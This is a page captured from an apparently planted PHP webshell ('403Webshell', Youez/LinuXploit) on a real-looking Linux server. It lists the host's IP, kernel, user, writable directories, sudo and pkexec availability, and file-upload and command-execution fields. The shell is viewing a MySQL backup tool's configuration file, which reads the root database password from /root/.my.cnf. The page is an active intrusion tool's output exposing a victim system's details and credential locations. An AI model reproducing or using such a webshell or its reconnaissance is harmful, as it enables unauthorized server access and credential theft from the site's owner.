403Webshell
Server IP : 216.92.14.13  /  Your IP : 216.73.216.171
Web Server : Apache
System : Linux vps4089.pairvps.com 5.15.0-190-generic #200-Ubuntu SMP Fri Aug 7 15:06:04 UTC 2026 x86_64
User : rmlac2fmr ( 1040637)
PHP Version : 8.2.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /etc/surrogate/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /etc/surrogate/surrogate.conf
# surrogate
# config file

# define your basedir or everything breaks
my_root=/usr/local/lib/surrogate

mysql_instances="3306"
#mysql_instances="3306 3307" # mysqld_multi example

mysql_socket="/tmp/mysql.sock"
#mysql_socket_3306=/run/mysqld/mysqld-3306.sock # mysqld_multi example
#mysql_socket_3307=/run/mysqld/mysqld-3307.sock # mysqld_multi example

# mysql credentials
mysql_user=root
mysql_pass=`grep ^password= /root/.my.cnf | head -1 | cut -d= -f2`

# if log_path does not exist, please create it
mysql_data_path="/usr/local/var/mysql"
mysql_log_path="/usr/local/var/logs"
backup_directory="/usr/local/var/backups"
mysql_collapse_path="/usr/local/var/backups/tmp"

# temp directory for staging data
mysql_sanity_path="/usr/local/var/tmp"

# date
now=`date +%Y-%m-%d_%H%M`
today=daily/`date +%a`
week=weekly/`date +%Y-%m`
month=monthly/`date +%b`

# backup dirs
inc_backup_path="$backup_directory/$today/inc_$now"
last_backup=`touch $backup_directory/.digest && tail -n1 $backup_directory/.digest`

active_backup="$backup_directory/active_restore"
active_incremental="$backup_directory/active_incremental"

backup_filename="collapsed_`date +%Y-%m-%d_%H%M`"

# log files
logfile_f="/var/log/surrogate"
logfile_i="/var/log/surrogate"
logfile_r="/var/log/surrogate"
logfile_c="/var/log/surrogate"
log="/var/log/surrogate"

# data retention
daily_retention="7" # in days
weekly_retention="28" # in days
monthly_retention="180" # in days

# fin

Youez - 2016 - github.com/yon3zu
LinuXploit